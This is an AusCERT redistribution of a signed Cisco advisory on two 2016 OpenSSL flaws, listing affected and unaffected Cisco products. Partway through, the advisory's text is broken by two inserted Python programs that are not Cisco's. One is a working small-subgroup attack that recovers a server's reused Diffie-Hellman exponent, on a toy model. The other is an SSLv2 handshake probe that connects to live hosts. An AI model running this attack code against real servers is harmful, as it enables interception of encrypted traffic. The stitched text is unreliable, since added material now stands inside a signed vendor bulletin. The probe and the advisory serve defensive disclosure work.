-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2016.0279
  Multiple Vulnerabilities in OpenSSL (January 2016) Affecting Cisco Products
                               4 February 2016

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Cisco products
Publisher:         Cisco Systems
Operating System:  Cisco
Impact/Access:     Access Privileged Data         -- Remote/Unauthenticated
                   Provide Misleading Information -- Remote/Unauthenticated
Resolution:        Patch/Upgrade
CVE Names:         CVE-2016-0701 CVE-2015-3197

Reference:         ESB-2016.0250

Original Bulletin:
   http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160129-openssl

- --------------------------BEGIN INCLUDED TEXT--------------------

Multiple Vulnerabilities in OpenSSL (January 2016) Affecting Cisco Products

High

Advisory ID:  cisco-sa-20160129-openssl
Last Updated: 2016 February 2 15:26 GMT
Published:    2016 January 29 16:00 GMT
Version 1.1:  Interim
Workarounds:  No workarounds available
CVE-2015-3197
CVE-2016-0701

Summary

On January 28, 2016, the OpenSSL Project released a security advisory detailing two vulnerabilities. Multiple Cisco products incorporate a version of the OpenSSL package affected by one or more vulnerabilities that could allow an unauthenticated, remote attacker to conduct man-in-the-middle attacks on an SSL/TLS connection.

This advisory will be updated as additional information becomes available.

Cisco will release software updates that address these vulnerabilities. Workarounds that address these vulnerabilities are not available.
This advisory is available at the following link:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160129-openssl

Affected Products

Cisco is currently investigating its product line to determine which products may be affected by these vulnerabilities and the impact on each affected product. As the investigation progresses, this document will be updated to include the Cisco bug IDs for each affected product. The bugs will be accessible through the Cisco Bug Search Tool and will contain additional platform-specific information, including workarounds (if available) and fixed software versions.

The following products are under active investigation to determine whether they are affected by the vulnerability that is described in this advisory.

Products Under Investigation

Collaboration and Social Media
  Cisco WebEx Meetings Server versions 1.x
  Cisco WebEx Meetings Server versions 2.x

Endpoint Clients and Client Software
  Cisco Agent for OpenFlow
  Cisco AnyConnect Secure Mobility Client for Android
  Cisco AnyConnect Secure Mobility Client for Linux
  Cisco AnyConnect Secure Mobility Client for OS X
  Cisco AnyConnect Secure Mobility Client for Windows
  Cisco AnyConnect Secure Mobility Client for iOS
  Cisco Jabber for Android
  Cisco Jabber for Windows
  Cisco Jabber for iOS
  Cisco MMP Server
  Cisco WebEx Connect Client (Windows)
  Cisco WebEx Meetings Client - Hosted
  Cisco WebEx Meetings Client - On-premises
  Cisco WebEx Meetings for Blackberry
  Cisco WebEx Meetings for WP8
  WebEx Meetings Server - SSL Gateway
  WebEx Recording Playback Client

Network Application, Service, and Acceleration
  Cisco ACE 30 Application Control Engine Module
  Cisco ACE 4710 Application Control Engine (A5)
  Cisco InTracer
  Cisco Network Admission Control (NAC)
  Cisco Visual Quality Experience Server
  Cisco Visual Quality Experience Tools Server

Network and Content Security Devices
  Cisco ASA Next-Generation Firewall Services
  Cisco Clean Access Manager
  Cisco Content Security Appliance Updater Servers
  Cisco Content Security Management Appliance (SMA)
  Cisco Email Security Appliance (ESA)
  Cisco IPS
  Cisco Identity Services Engine (ISE)
  Cisco IronPort Encryption Appliance (IEA)
  Cisco NAC Guest Server
  Cisco NAC Server
  Cisco Physical Access Control Gateway
  Cisco Secure Access Control Server (ACS)
  Cisco Virtual Security Gateway for Microsoft Hyper-V
  Cisco Web Security Appliance (WSA)

Network Management and Provisioning
  Cisco Application Networking Manager
  Cisco Application Policy Infrastructure Controller (APIC)
  Cisco Cloupia Unified Infrastructure Controller
  Cisco Configuration Professional
  Cisco MATE Collector
  Cisco MATE Design
  Cisco MATE Live
  Cisco Management Appliance (MAP)
  Cisco NetFlow Generation Appliance
  Cisco Prime Access Registrar
  Cisco Prime Collaboration Assurance
  Cisco Prime Collaboration Deployment
  Cisco Prime Data Center Network Manager (DCNM)
  Cisco Prime Home
  Cisco Prime Infrastructure
  Cisco Prime LAN Management Solution (LMS - Solaris)
  Cisco Prime License Manager
  Cisco Prime Network Registrar IP Address Manager (IPAM)
  Cisco Prime Performance Manager
  Cisco Prime Security Manager
  Cisco Quantum Policy Suite (QPS)
  Cisco Quantum SON Suite
  Cisco Security Manager

Routing and Switching - Enterprise and Service Provider
  Cisco ASR 5000 Series
  Cisco Connected Grid Router - CGOS
  Cisco Connected Grid Router
  Cisco IOS XE (SSLVPN feature)
  Cisco IOS XE (WebUI feature only)
  Cisco IOS XR
  Cisco Nexus 1000V InterCloud
  Cisco Nexus 1000V Series Switches (ESX)
  Cisco Nexus 1000V Series Switches
  Cisco Nexus 1000V Switch for Microsoft Hyper-V
  Cisco Nexus 1010
  Cisco Nexus 3000 Series Switches
  Cisco Nexus 3X00 Series Switches
  Cisco Nexus 4000 Series Blade Switches
  Cisco Nexus 5000 Series Switches
  Cisco Nexus 9000 (ACI/Fabric Switch)
  Cisco Nexus 9000 Series (standalone, running NxOS)
  Cisco Nexus 9000 Series Switches
  Cisco ONS 15454 Series Multiservice Provisioning Platforms
  Cisco Service Control Operating System

Routing and Switching - Small Business
  Cisco Sx220 switches
  Cisco Sx300 switches
  Cisco Sx500 switches

Unified Computing
  Cisco Common Services Platform Collector
  Cisco Standalone rack server CIMC
  Cisco UCS Invicta Series Solid State Systems
  Cisco Unified Computing System (Management software)
  Cisco Unified Computing System B-Series (Blade) Servers
  Cisco Virtual Security Gateway

Voice and Unified Communications Devices
  Cisco 7937 IP Phone
  Cisco ATA 187 Analog Telephone Adaptor
  Cisco Agent Desktop for Cisco Unified Contact Center Express
  Cisco Agent Desktop
  Cisco DX Series IP Phones
  Cisco Emergency Responder
  Cisco Finesse
  Cisco IM and Presence Service (CUPS)
  Cisco MediaSense
  Cisco MeetingPlace
  Cisco Packaged Contact Center Enterprise
  Cisco Paging Server (Informacast)
  Cisco Paging Server
  Cisco Remote Silent Monitoring
  Cisco TAPI Service Provider (TSP)
  Cisco Unified 8831 series IP Conference Phone
  Cisco Unified Attendant Console Advanced
  Cisco Unified Attendant Console Business Edition
  Cisco Unified Attendant Console Department Edition
  Cisco Unified Attendant Console Enterprise Edition
  Cisco Unified Attendant Console Premium Edition
  Cisco Unified Attendant Console Standard
  Cisco Unified Communications Domain Manager
  Cisco Unified Communications Manager (UCM)
  Cisco Unified Communications Manager Session Management Edition (SME)
  Cisco Unified Communications for Microsoft Lync
  Cisco Unified E-Mail Interaction Manager
  Cisco Unified SIP Proxy
  Cisco Unified Web Interaction Manager
  Cisco Unified Workforce Optimization Quality Management
  Cisco Unified Workforce Optimization
  Cisco Unity Connection (UC)
  Cisco Virtual PGW 2200 Softswitch
  Cisco Virtualization Experience Media Engine
  Cisco Voice Portal (CVP)

Video, Streaming, TelePresence, and Transcoding Devices
  Cisco AnyRes Live (CAL)
  Cisco D9859 Advanced Receiver Transcoder
  Cisco DCM Series 9900-Digital Content Manager
  Cisco Enterprise Content Delivery System (ECDS)
  Cisco Expressway Series
  Cisco Headend System Release
  Cisco Internet Streamer (CDS)
  Cisco Model D9485 DAVIC QPSK
  Cisco TelePresence 1310
  Cisco TelePresence Conductor
  Cisco TelePresence Content Server (TCS)
  Cisco TelePresence ISDN GW 3241
  Cisco TelePresence ISDN GW MSE 8321
  Cisco TelePresence ISDN Link
  Cisco TelePresence MCU (8510, 8420, 4200, 4500, and 5300)
  Cisco TelePresence Serial Gateway Series
  Cisco TelePresence Server 8710, 7010
  Cisco TelePresence Server on Multiparty Media 310, 320
  Cisco TelePresence Server on Virtual Machine
  Cisco TelePresence Supervisor MSE 8050
  Cisco TelePresence System 1000
  Cisco TelePresence System 1100
  Cisco TelePresence System 1300
  Cisco TelePresence System 3000 Series
  Cisco TelePresence System 500-32
  Cisco TelePresence System 500-37
  Cisco TelePresence TX 9000 Series
  Cisco TelePresence Video Communication Server (VCS)
  Cisco VEN501 Wireless Access Point
  Cisco Video Distribution Suite for Internet Streaming (VDS-IS/CDS-IS)
  Cisco Video Surveillance 3000 Series IP Cameras
  Cisco Video Surveillance 4000 Series High-Definition IP Cameras
  Cisco Video Surveillance 4300E/4500E High-Definition IP Cameras
  Cisco Video Surveillance 6000 Series IP Cameras
  Cisco Video Surveillance 7000 Series IP Cameras
  Cisco Video Surveillance Media Server
  Cisco Video Surveillance PTZ IP Cameras
  Cisco Videoscape Control Suite
  Cloud Object Store (COS)
  Tandberg Codian ISDN GW 3210/3220/3240
  Tandberg Codian MSE 8320 model

Wireless
  Cisco Aironet 2700 Series Access Point
  Cisco Mobility Services Engine (MSE)
  Cisco Wireless LAN Controller (WLC)

Cisco Hosted Services
  Cisco Cloud Web Security
  Cisco Connected Analytics For Collaboration
  Cisco Intelligent Automation for Cloud
  Cisco One Portal
  Cisco Proactive Network Operations Center
  Cisco Smart Care
  Cisco SmartConnection
  Cisco SmartReports
  Cisco UCS Invicta Series Autosupport Portal
  Cisco Unified Services Delivery Platform (CUSDP)
  Cisco Universal Small Cell usc-iuh
  Cisco WebEx Meeting Center
  Cisco WebEx Meetings (Meeting Center, Training Center, Event Center, Support Center)
  Communication/Collaboration Sizing Tool, Virtue Machine Placement Tool, Cisco Unified Communications Upgrade Readiness Assessment
  Life Cycle Management Agent Manager (LCM)
  Network Health Framework (NHF)
  Network Performance Analytics (NPA)
  Partner Supporting Service (PSS) 1.x
  Services Analytic Platform
  Small Cell factory recovery root filesystem V2.99.4 or later

Vulnerable Products

The following table lists Cisco products that are affected by the vulnerability that is described in this advisory.

Product                                                      Defect (Cisco bug ID)

Network Management and Provisioning
  Cisco Prime Collaboration Provisioning                     CSCuy07329
  Cisco Prime Optical for SPs                                CSCuy07316

Routing and Switching - Enterprise and Service Provider
  Cisco MDS 9000 Series Multilayer Switches                  CSCuy07280
  Cisco Nexus 5000 Series Switches                           CSCuy07280
  Cisco Nexus 6000 Series Switches                           CSCuy07280
  Cisco Nexus 7000 Series Switches                           CSCuy07280

Voice and Unified Communications Devices
  Cisco 8800 Series IP Phones - VPN Feature                  CSCuy07524
  Cisco Computer Telephony Integration Object Server (CTIOS) CSCuy07225
  Cisco Unified 7800 Series IP Phones                        CSCuy07527
  Cisco Unified 8945 IP Phone                                CSCuy07517
  Cisco Unified Contact Center Enterprise                    CSCuy07225
  Cisco Unified Intelligent Contact Management Enterprise    CSCuy07225

Video, Streaming, TelePresence, and Transcoding Devices
  Cisco Edge 300 Digital Media Player                        CSCuy07442

Cisco Hosted Services
  Cisco Registered Envelope Service (CRES)                   CSCuy07230
  Cisco WebEx Messenger Service                              CSCuy07254

Products Confirmed Not Vulnerable

The following products are not affected by the vulnerability that is described in this advisory.
Collaboration and Social Media
  Cisco WebEx Node for MCS

Endpoint Clients and Client Software
  Cisco Jabber Guest Release 10.0(2)
  Cisco Jabber Software Development Kit
  Cisco Jabber for Mac
  Cisco WebEx Meetings for Android
  Cisco WebEx Productivity Tools

Network Application, Service, and Acceleration
  Cisco Application and Content Networking System (ACNS)
  Cisco Wide Area Application Services (WAAS)

Network and Content Security Devices
  Cisco ASA CX and Cisco Prime Security Manager
  Cisco ASA Content Security and Control (CSC) Security Services Module
  Cisco Adaptive Security Appliance (ASA)
  Cisco FireSIGHT System Software
  Cisco Secure Access Control System (ACS)

Network Management and Provisioning
  Cisco Digital Media Manager
  Cisco Mobile Wireless Transport Manager
  Cisco Multicast Manager
  Cisco Network Analysis Module
  Cisco Packet Tracer
  Cisco Prime IP Express
  Cisco Prime Infrastructure Standalone Plug and Play Gateway
  Cisco Prime Network Registrar (CPNR)
  Cisco Prime Network Services Controller
  Cisco Prime Network
  Cisco Show and Share (SnS)
  Cisco UCS Central
  Local Collector Appliance (LCA)

Routing and Switching - Enterprise and Service Provider
  Cisco 910 Industrial Router
  Cisco Broadband Access Center Telco Wireless
  Cisco IOS Software and Cisco IOS XE Software
  Cisco OnePK All-in-One VM

Voice and Unified Communications Devices
  Cisco 190 ATA Series Analog Terminal Adaptor
  Cisco Hosted Collaboration Mediation Fulfillment
  Cisco IP Interoperability and Collaboration System (IPICS)
  Cisco SPA112 2-Port Phone Adapter
  Cisco SPA122 ATA with Router
  Cisco SPA232D Multi-Line DECT ATA
  Cisco SPA30X Series IP Phones
  Cisco SPA50X Series IP Phones
  Cisco SPA51X Series IP Phones
  Cisco SPA525G
  Cisco SPA8000 8-port IP Telephony Gateway
  Cisco SPA8800 IP Telephony Gateway with 4 FXS and 4 FXO Ports
  Cisco Unified 6901 IP Phones
  Cisco Unified 6945 IP Phones
  Cisco Unified 8961 IP Phone
  Cisco Unified 9951 IP Phone
  Cisco Unified 9971 IP Phone
  Cisco Unified IP Conference Phone 8831 for Third-Party Call Control
  Cisco Unified IP Phone 7900 Series
  Cisco Unified Wireless IP Phone

Video, Streaming, TelePresence, and Transcoding Devices
  Cisco AnyRes VOD (CAL)
  Cisco Digital Media Players (DMP) 4300 Series
  Cisco Digital Media Players (DMP) 4400 Series
  Cisco Edge 340 Digital Media Player
  Cisco Media Experience Engines (MXE)
  Cisco Media Services Interface
  Cisco TelePresence EX Series
  Cisco TelePresence MX Series
  Cisco TelePresence Profile Series
  Cisco TelePresence SX Series
  Cisco TelePresence Integrator C Series

Cisco Hosted Services
  Cisco Services Provisioning Platform (SPP)
  Cisco Universal Small Cell 5000 Series running V3.4.2.x software
  Cisco Universal Small Cell 7000 Series running V3.4.2.x software
  Serial Number Assessment Service (SNAS)

Details

The vulnerability names and the associated Common Vulnerabilities and Exposures (CVE) IDs for the January 28, 2016, OpenSSL Project announcement are as follows:

OpenSSL DH Small Subgroups Vulnerability

A vulnerability in the generation of Diffie-Hellman (DH) parameters based on unsafe primes in OpenSSL could allow an unauthenticated, remote attacker to discover a TLS server's private DH exponent.

The vulnerability is due to the ability to generate DH parameters based on unsafe primes (primes p for which (p-1)/2 is not itself prime, so the group contains small subgroups), introduced in version 1.0.2 of OpenSSL when support was added for generating X9.42-style parameter files. An attacker could exploit this vulnerability by completing multiple handshakes against a server that reuses the same private DH exponent across handshakes (a server that does not set SSL_OP_SINGLE_DH_USE). An exploit could allow the attacker to discover a TLS server's private DH exponent and conduct man-in-the-middle attacks on the SSL/TLS connection.

This vulnerability has been assigned CVE ID CVE-2016-0701.

OpenSSL SSLv2 Doesn't Block Disabled Ciphers

A vulnerability in the SSL negotiation of OpenSSL could allow an unauthenticated, remote attacker to negotiate SSLv2 ciphers that have been disabled on the server.
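The DH small-subgroups attack summarised above (CVE-2016-0701) can be shown end to end on a toy modulus. The Python below is an added example written for this bulletin, not code from Cisco or the OpenSSL Project. It builds a prime p whose p-1 is a product of small primes (the "unsafe" shape that X9.42-style parameter generation can produce; the toy makes p-1 entirely smooth so that recovery completes, whereas real X9.42 parameters leak the exponent only modulo the small factors of the cofactor), models a server that reuses one private DH exponent for every handshake, and plays the client side of one handshake per small prime. The client learns from each handshake only whether its guess of the shared secret makes the server's Finished MAC verify, which is what a real attacker observes; because the client's public value has small order r, the server's secret takes only r possible values, which yields x mod r, and the Chinese remainder theorem combines the residues. Run with single_use=True, the same code models the defence that the fixed OpenSSL release turns on unconditionally (SSL_OP_SINGLE_DH_USE, a fresh exponent per handshake): the residues then come from unrelated exponents and the recovery fails. The prime size, the HMAC-SHA256 stand-in for TLS key derivation and the Finished computation, and the DHServer class are assumptions of this example.

```python
"""Small-subgroup confinement against a server that reuses its DH exponent (toy model of
CVE-2016-0701). Added example for this bulletin; not Cisco or OpenSSL Project code."""
import hashlib
import hmac
import os
import random
from itertools import count
from math import isqrt, prod

# Odd primes forced into p-1. A safe prime p = 2q+1 has none; X9.42-style parameters may.
# Toy assumption: p-1 is made entirely smooth so that the recovery completes.
SMALL_FACTORS = [3, 5, 7, 11, 13, 17, 19, 23]


def is_prime(n: int) -> bool:
    """Trial division; enough for the ~30-bit toy modulus."""
    if n < 2 or n % 2 == 0:
        return n == 2
    return all(n % d for d in range(3, isqrt(n) + 1, 2))


def prime_factors(n: int) -> list:
    """Distinct prime factors of n, ascending."""
    out, d = [], 2
    while d * d <= n:
        if n % d == 0:
            out.append(d)
            while n % d == 0:
                n //= d
        d += 1
    return out + ([n] if n > 1 else [])


def make_unsafe_prime(factors=SMALL_FACTORS):
    """Smallest prime p = c * prod(factors) + 1 with even cofactor c. Returns (p, c)."""
    m = prod(factors)
    return next((c * m + 1, c) for c in count(2, 2) if is_prime(c * m + 1))


def primitive_root(p: int) -> int:
    """Generator of all of Z_p^*, so each exponent below p-1 has a distinct public value."""
    facs = prime_factors(p - 1)
    return next(g for g in count(2) if all(pow(g, (p - 1) // r, p) != 1 for r in facs))


def element_of_order(p: int, r: int) -> int:
    """Some h != 1 with h^r = 1 mod p (requires r | p-1)."""
    return next(h for h in (pow(a, (p - 1) // r, p) for a in count(2)) if h != 1)


def finished_mac(shared_secret: int, transcript: bytes) -> bytes:
    """Stand-in for TLS key derivation plus the Finished MAC (HMAC-SHA256 is an assumption)."""
    key = shared_secret.to_bytes((shared_secret.bit_length() + 7) // 8, "big")
    return hmac.new(key, transcript, hashlib.sha256).digest()


class DHServer:
    """Server side of a DH handshake. single_use=False is the vulnerable setting: one
    private exponent for every connection (SSL_OP_SINGLE_DH_USE unset)."""

    def __init__(self, p: int, g: int, single_use: bool = False):
        self.p, self.g, self.single_use = p, g, single_use
        self._x = random.randrange(2, p - 1)  # private exponent; read only by demo() to verify

    def handshake(self, client_pub: int, transcript: bytes):
        """Returns (server public value, Finished MAC over the shared secret)."""
        # A range check alone rejects p-1 (the only element of order 2) but no other
        # small-order element; a server that knows the subgroup order q would also
        # require pow(client_pub, q, p) == 1.
        if not 1 < client_pub < self.p - 1:
            raise ValueError("client public value out of range")
        x = random.randrange(2, self.p - 1) if self.single_use else self._x
        return pow(self.g, x, self.p), finished_mac(pow(client_pub, x, self.p), transcript)


def crt(residues, moduli):
    """x with x = r_i (mod n_i) for pairwise coprime n_i; returns (x, prod(n_i))."""
    x, m = 0, 1
    for r, n in zip(residues, moduli):
        x += m * (((r - x) * pow(m, -1, n)) % n)
        m *= n
    return x, m


def recover_exponent(server: DHServer, p: int, g: int, factors=SMALL_FACTORS):
    """One handshake per small prime r learns x mod r; CRT plus a short search gives x."""
    residues, server_pub = [], None
    for r in factors:
        h = element_of_order(p, r)      # public value confined to the order-r subgroup
        transcript = os.urandom(32)     # stands in for the handshake nonces
        server_pub, mac = server.handshake(h, transcript)
        # h^x has only r possible values; the MAC reveals which one the server derived.
        k = next((k for k in range(r)
                  if hmac.compare_digest(finished_mac(pow(h, k, p), transcript), mac)), None)
        if k is None:
            return None
        residues.append(k)
    x0, m = crt(residues, factors)
    # x < p-1 = c*m, so only the small cofactor c remains to be searched.
    return next((x0 + t * m for t in range((p - 1) // m)
                 if pow(g, x0 + t * m, p) == server_pub), None)


def demo(single_use: bool = False):
    """Returns (recovered exponent or None, the server's static exponent)."""
    p, _ = make_unsafe_prime()
    g = primitive_root(p)
    server = DHServer(p, g, single_use=single_use)
    return recover_exponent(server, p, g), server._x


if __name__ == "__main__":
    print("static exponent (vulnerable):", demo(single_use=False))
    print("fresh exponent per handshake:", demo(single_use=True))
```

With the toy factors the whole attack costs 98 handshakes (the sum of the small primes), and each handshake is indistinguishable from a client with a poorly chosen public value; this is why the fix has to be on the server side, either never reusing the exponent or rejecting public values outside the expected prime-order subgroup.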
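For the SSLv2 issue (CVE-2015-3197), the check a practitioner wants is whether a server still completes an SSLv2 handshake at all, not what its cipher list says. The Python probe below is an added example, not Cisco's or the OpenSSL Project's code: it sends an SSLv2 ClientHello offering every SSLv2 cipher kind and parses the reply. A server that answers with an SSLv2 ServerHello is accepting SSLv2 regardless of which ciphers its configuration has disabled; a server on which the protocol itself is switched off (SSL_OP_NO_SSLv2 in OpenSSL terms), or that only speaks TLS, answers with a TLS alert or closes the connection. The cipher-kind constants and message layouts follow the SSLv2 specification; the host and port, the timeout, and the build_server_hello helper used to exercise the parser offline are assumptions of this example.

```python
"""SSLv2 handshake probe for CVE-2015-3197.
Added example for this bulletin; not Cisco or OpenSSL Project code."""
import os
import socket
import struct

# SSLv2 CIPHER-KIND values, 3 bytes each, from the SSLv2 specification.
SSLV2_CIPHERS = {
    "SSL_CK_RC4_128_WITH_MD5": b"\x01\x00\x80",
    "SSL_CK_RC4_128_EXPORT40_WITH_MD5": b"\x02\x00\x80",
    "SSL_CK_RC2_128_CBC_WITH_MD5": b"\x03\x00\x80",
    "SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5": b"\x04\x00\x80",
    "SSL_CK_IDEA_128_CBC_WITH_MD5": b"\x05\x00\x80",
    "SSL_CK_DES_64_CBC_WITH_MD5": b"\x06\x00\x40",
    "SSL_CK_DES_192_EDE3_CBC_WITH_MD5": b"\x07\x00\xc0",
}
MSG_CLIENT_HELLO = 1
MSG_SERVER_HELLO = 4
TLS_RECORD_TYPES = (b"\x15", b"\x16")  # TLS alert / handshake: a TLS reply, not SSLv2


def ssl2_record(body: bytes) -> bytes:
    """Two-byte SSLv2 record header: high bit set means no padding, 15-bit length."""
    assert len(body) < 0x8000
    return struct.pack(">H", 0x8000 | len(body)) + body


def build_client_hello(cipher_kinds, challenge: bytes = None) -> bytes:
    """CLIENT-HELLO: type, version 0x0002, three lengths, cipher specs, no session id, challenge."""
    challenge = challenge if challenge is not None else os.urandom(16)
    specs = b"".join(cipher_kinds)
    body = (bytes([MSG_CLIENT_HELLO]) + b"\x00\x02"
            + struct.pack(">HHH", len(specs), 0, len(challenge))
            + specs + challenge)
    return ssl2_record(body)


def build_server_hello(cert: bytes, cipher_kinds, conn_id: bytes) -> bytes:
    """SERVER-HELLO as a server would send it; used here only to exercise the parser offline."""
    specs = b"".join(cipher_kinds)
    body = (bytes([MSG_SERVER_HELLO, 0, 1]) + b"\x00\x02"  # no session hit, X.509 cert, v2.0
            + struct.pack(">HHH", len(cert), len(specs), len(conn_id))
            + cert + specs + conn_id)
    return ssl2_record(body)


def parse_record(data: bytes):
    """Payload of the first complete SSLv2 record in data, else None."""
    if len(data) < 2:
        return None
    if data[0] & 0x80:
        length, hdr = ((data[0] & 0x7F) << 8) | data[1], 2
    else:  # 3-byte header carrying a padding-length byte
        length, hdr = ((data[0] & 0x3F) << 8) | data[1], 3
    if len(data) < hdr + length:
        return None
    return data[hdr:hdr + length]


def parse_server_hello(payload: bytes):
    """Cipher kinds offered back in a SERVER-HELLO, or None if payload is not one."""
    if len(payload) < 11 or payload[0] != MSG_SERVER_HELLO:
        return None
    _hit, _cert_type, _ver, cert_len, spec_len, _conn_len = struct.unpack(">BBHHHH", payload[1:11])
    specs = payload[11 + cert_len: 11 + cert_len + spec_len]
    return [specs[i:i + 3] for i in range(0, len(specs) - len(specs) % 3, 3)]


def probe(host: str, port: int = 443, timeout: float = 5.0):
    """Cipher kinds from the server's SSLv2 ServerHello; [] if no SSLv2 handshake completes."""
    hello = build_client_hello(list(SSLV2_CIPHERS.values()))
    data = b""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(hello)
            while True:
                if data[:1] in TLS_RECORD_TYPES:
                    return []               # the server answered in TLS, so no SSLv2
                payload = parse_record(data)
                if payload is not None:
                    break
                chunk = sock.recv(4096)
                if not chunk:
                    return []               # closed without any SSLv2 reply
                data += chunk
    except OSError:                         # refused, reset or timed out
        return []
    return parse_server_hello(payload) or []


def names(cipher_kinds):
    """Human-readable names for cipher kinds, hex for anything unknown."""
    by_value = {v: k for k, v in SSLV2_CIPHERS.items()}
    return [by_value.get(c, c.hex()) for c in cipher_kinds]


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "localhost"  # assumed target
    offered = probe(target, int(sys.argv[2]) if len(sys.argv) > 2 else 443)
    print("SSLv2 accepted, server offered:" if offered else "no SSLv2 handshake", names(offered))
```

Any non-empty result from probe() means the host will negotiate SSLv2 with a client that asks for it, which is the exposure the advisory describes whether or not the server's cipher configuration claims otherwise; the remedy is the vendor's fixed software, with SSLv2 disabled as a protocol rather than by cipher list.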
The vulnerability (CVE-2015-3197) is due to the ability of a malicious client to negotiate SSLv2 ciphers that have been disabled on the server and to complete an SSLv2 handshake even when all SSLv2 ciphers have been disabled, provided the SSLv2 protocol itself has not also been disabled (SSL_OP_NO_SSLv2 in OpenSSL terms). An exploit could allow the attacker to negotiate weak SSLv2 ciphers for SSL/TLS connections, making them vulnerable to man-in-the-middle attacks.

This vulnerability has been assigned CVE ID CVE-2015-3197.

Workarounds

Any workarounds will be documented in the Cisco bugs, which are accessible through the Cisco Bug Search Tool.

Fixed Software

Cisco has released free software updates that address the vulnerability described in this advisory.

Customers may only install and expect support for software versions and feature sets for which they have purchased a license. By installing, downloading, accessing, or otherwise using such software upgrades, customers agree to follow the terms of the Cisco software license:
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html

Additionally, customers may only download software for which they have a valid license, procured from Cisco directly, or through a Cisco authorized reseller or partner. In most cases this will be a maintenance upgrade to software that was previously purchased. Free security software updates do not entitle customers to a new software license, additional software feature sets, or major revision upgrades.

When considering software upgrades, customers are advised to consult the Cisco Security Advisories and Responses archive at http://www.cisco.com/go/psirt and review subsequent advisories to determine exposure and a complete upgrade solution.

In all cases, customers should ensure that the devices to upgrade contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release.
If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers.

Exploitation and Public Announcements

The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

Source

These vulnerabilities were publicly disclosed by the OpenSSL Project on January 28, 2016.

URL

http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160129-openssl

Revision History

Version  Description                                          Section            Status   Date
1.1      Updated information about products under             Affected Products  Interim  2016-February-02
         investigation, confirmed as not vulnerable,
         and vulnerable.
1.0      Initial public release.                              -                  Interim  2016-January-29

Legal Disclaimer

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME. CISCO EXPECTS TO UPDATE THIS DOCUMENT AS NEW INFORMATION BECOMES AVAILABLE.

A standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. The information in this document is intended for end users of Cisco products.

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager.
If you do not know who that is, please send an email to auscert@auscert.org.au and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin.

NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:
http://www.auscert.org.au/render.html?cid=1980

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
=========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBVrKjaX6ZAP0PgtI9AQLPvw/+JuBMEG/A0McE8ulHHpVdREP+ILn+MCAP osY/TRui5kVQzXb4AGNqweZoqiWKrynKJHRMPGHN20Y3YoJp6t04MYzM1uAKzHeW 9TzWbOvkDlPw29BoCifXc/tZgTfq4+vwgvOktgP0C0HKHr+6J5LyuAEorq58OyEp 8kqfCmOe86B1j7fRyx50u2FbqnCcMk9WAET2+Ljxfcy2xiqI6cVLtFvPebPIBGYJ B2WV34S9ItX+2v8bLSRgMFUVrF2vsiByWDJJU47rLDwPC56nRfkWsdXn+aoH9DhF PIBHQI7e9DYmXGFgY/yiEwhxV8vreU1U7CN3L7kh82Id7qmn+xwoFo80+51wC4fx XoGcC2MhgT8KVQeZ6RUELdFFUgBNulZNZyOV9yfjySL5A7Rn1vOsdRLnNISiKP91 Ogu69TTW92Pl5FnxxMvPeEiakUC2fQAYNys4oZe0UJUROB+QYsvCnjp+dz3DYPak L75SKdHBo64Y7APsHsNKQ+jj7AXO6ZABpQg5ogwM9bTacl6qYVvfzuVt1aa1OBIw ebdo0hErIpvuxcn5pSUOuLAPxnqRYw0xIXkBuEoPKql7K0uoGmO6umimzG8R58eZ XVWkTK0hwxcbk9tQ++R82dsU9BhzydaVGC99GqezoeiKuiSsSKWN4B0CKsGMjd/R WVY078fi14g= =hoV1 -----END PGP SIGNATURE-----